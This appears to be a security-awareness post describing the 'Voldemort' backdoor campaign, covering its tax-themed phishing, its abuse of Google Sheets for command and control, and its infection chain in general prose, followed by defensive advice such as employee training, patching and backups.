Here’s what you need to know about Voldemort Malware, how it operates, and steps you can take to protect yourself.
Another malware campaign has emerged, presenting significant risks to organisations across various sectors worldwide. Researchers have named this sophisticated malware “Voldemort.” It uniquely uses unexpected tools like Google Sheets to execute attacks, making it distinctive and hazardous.
What Is Voldemort Malware?
Voldemort is a custom backdoor malware recently discovered by cybersecurity experts.
Unlike traditional malware, Voldemort utilizes Google Sheets as its command-and-control (C2) mechanism, allowing it to communicate with its operators and receive instructions. This malware has targeted over 70 organizations across various industries, including insurance, finance, healthcare, technology, and government sectors. The campaign behind Voldemort is suspected to be part of a larger cyber espionage effort, although the exact perpetrators remain unidentified.
The Voldemort malware is particularly concerning due to its unconventional approach to spreading and executing malicious code. It impersonates tax authorities from various countries—including the U.S., U.K., and Japan—to trick recipients into clicking on links that appear legitimate but redirect them to a landing page designed to exploit their systems.
How Does Voldemort Malware Work?
The attack begins with phishing emails claiming to be from tax authorities, warning recipients about changes to their tax filings. These emails include links that, when clicked, lead to a webpage that checks whether the victim is using a Windows operating system. If the user is on Windows, the webpage uses a Windows shortcut file disguised as a PDF to initiate the attack.
Once the user is tricked into opening this file, a sequence of commands is triggered. The Windows shortcut file invokes PowerShell, which runs a Python script from a remote server. This script gathers system information and sends it back to the attackers. To avoid detection, the script does not download any files directly onto the victim’s computer. Instead, it loads dependencies from a WebDAV share, a technique that further obscures the attack.
The malware then displays a decoy PDF to the user to maintain the illusion of legitimacy while simultaneously downloading a password-protected ZIP file. This ZIP file contains a legitimate executable vulnerable to DLL side-loading and a malicious DLL, which is the Voldemort malware itself. The malware then exploits Google Sheets to exfiltrate data and execute commands.
The Significance of the Attack
The combination of advanced and basic techniques used by the Voldemort malware is particularly alarming. It employs sophisticated methods, such as abusing Google Sheets for C2 communication, while also relying on simpler tactics like phishing and using legitimate software components to evade detection. This blend of old and new tactics complicates cybersecurity experts’ efforts to fully understand the attackers’ intentions or anticipate their next move.
The campaign appears to be extensive, targeting a wide range of industries and potentially casting a broad net to gather intelligence before zeroing in on specific high-value targets. With over 20,000 phishing emails sent as part of this campaign, the scale of the operation is significant, even though the exact number of successful infections remains unclear.
How to Protect Yourself from Voldemort Malware
While waiting for this malware to be eradicated, it’s essential to limit access to external file-sharing services as much as possible. However, the most effective defense is to strengthen the human factor, which remains a critical weak point exploited by criminals to penetrate organizations’ systems.
🐍 𝐁𝐞 𝐂𝐚𝐮𝐭𝐢𝐨𝐮𝐬 𝐰𝐢𝐭𝐡 𝐄𝐦𝐚𝐢𝐥 𝐋𝐢𝐧𝐤𝐬: Always verify the authenticity of emails, especially those that claim to be from government agencies or other authoritative bodies.
Avoid clicking on links from unknown or suspicious sources.
🐍 𝐔𝐩𝐝𝐚𝐭𝐞 𝐚𝐧𝐝 𝐏𝐚𝐭𝐜𝐡 𝐒𝐨𝐟𝐭𝐰𝐚𝐫𝐞: Ensure all software, particularly security applications, is current.
This includes applying patches for known vulnerabilities that malware could exploit.
🐍 𝐄𝐝𝐮𝐜𝐚𝐭𝐞 𝐚𝐧𝐝 𝐓𝐫𝐚𝐢𝐧 𝐄𝐦𝐩𝐥𝐨𝐲𝐞𝐞𝐬: Conduct regular hashtag#cybersecuritytraining for employees to recognize hashtag#phishing attempts and other common attack vectors.
🐍 𝐈𝐦𝐩𝐥𝐞𝐦𝐞𝐧𝐭 𝐀𝐝𝐯𝐚𝐧𝐜𝐞𝐝 𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐌𝐞𝐚𝐬𝐮𝐫𝐞𝐬: Use powerful threat detection and response tools that can identify and mitigate sophisticated attacks like those involving Voldemort.
Network monitoring, endpoint protection, and intrusion detection systems are essential.
🐍 𝐁𝐚𝐜𝐤𝐮𝐩 𝐂𝐫𝐢𝐭𝐢𝐜𝐚𝐥 𝐃𝐚𝐭𝐚: Regularly back up important data to reduce the impact of a potential malware attack.
Cybercriminals often prepare well-packaged bait designed to deceive victims, typically employees or operators within a company or organization, into clicking on malicious links.
Not falling into this trap is, therefore, the most effective defense. Achieving this outcome requires quality training, including continuous practical exercises and staying updated with the latest security news.
